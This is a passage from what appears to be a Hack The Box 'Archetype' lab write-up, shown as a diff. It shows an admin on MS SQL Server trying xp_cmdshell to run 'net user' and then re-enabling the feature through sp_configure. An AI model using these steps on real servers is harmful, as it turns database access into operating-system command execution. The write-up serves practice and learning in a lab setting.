FranciscoJavierPizarro/hackthebox_writeups/startingPoint/tier2/Archetype.md

           1
 ```
+Since we are admin we try to run cmd commands

 ```
 SQL> EXEC xp_cmdshell 'net user';
 [-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server.
 A system administrator can enable the use of 'xp_cmdshell' by using sp_configure.
 For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

 ```
+The current settings doesn't allow us to do so, but as we are admin we are allowed to change that setting.
 ```
 SQL> EXEC sp_configure 'show advanced options', 1;
 [*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1.
 Run the RECONFIGURE statement to install.